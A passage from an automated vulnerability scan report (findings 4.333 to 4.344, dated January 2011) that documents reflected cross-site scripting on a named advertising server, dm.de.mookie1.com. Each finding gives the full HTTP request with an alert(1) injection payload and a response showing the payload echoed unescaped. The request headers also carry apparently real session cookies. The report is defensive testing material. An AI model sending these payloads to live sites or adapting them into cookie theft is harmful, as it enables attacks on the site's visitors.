Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3008204f"-alert(1)-"98ce25bd14a";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.333. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/117382567@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd20"-alert(1)-"8bbf31670d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&1dd20"-alert(1)-"8bbf31670d1=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&1dd20"-alert(1)-"8bbf31670d1=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.334. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11819507567@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d72"><script>alert(1)</script>d7977f5f4c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM38d72"><script>alert(1)</script>d7977f5f4c4/2010DM/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM38d72"><script>alert(1)</script>d7977f5f4c4/2010DM/421318644/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.335. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11819507567@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb8e"><script>alert(1)</script>2506b43238c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1fb8e"><script>alert(1)</script>2506b43238c/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1fb8e"><script>alert(1)</script>2506b43238c/1494015477/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.336. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11819507567@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11226"><script>alert(1)</script>50c898679b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11819507567@x2311226"><script>alert(1)</script>50c898679b1?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1967467645/x2311226"><script>alert(1)</script>50c898679b1/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.337. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11819507567@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca1c1"-alert(1)-"203e0c80030 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728ca1c1"-alert(1)-"203e0c80030 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728ca1c1"-alert(1)-"203e0c80030";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.338. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11819507567@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3078f"-alert(1)-"5f07425cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&3078f"-alert(1)-"5f07425cbb4=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&3078f"-alert(1)-"5f07425cbb4=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.339. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11824141209@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af4c"><script>alert(1)</script>b80795c01a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM8af4c"><script>alert(1)</script>b80795c01a2/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM8af4c"><script>alert(1)</script>b80795c01a2/2010DM/745312788/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.340. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11824141209@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f1b"><script>alert(1)</script>7b3269718e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM89f1b"><script>alert(1)</script>7b3269718e9/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM89f1b"><script>alert(1)</script>7b3269718e9/1517820740/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.341. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11824141209@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf58f"><script>alert(1)</script>d6fa7baad79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11824141209@x23cf58f"><script>alert(1)</script>d6fa7baad79?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 324
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/76761339/x23cf58f"><script>alert(1)</script>d6fa7baad79/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

4.342. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11824141209@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98145"-alert(1)-"bde28f2b39e was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_30098145"-alert(1)-"bde28f2b39e HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_30098145"-alert(1)-"bde28f2b39e";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.343. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11824141209@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12cb8"-alert(1)-"b52dcf6ee5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&12cb8"-alert(1)-"b52dcf6ee5d=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&12cb8"-alert(1)-"b52dcf6ee5d=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.344. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11940003036@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4479"><script>alert(1)</script>e92a94cc08f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMb4479"><script>alert(1)</script>e92a94cc08f/2010DM/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
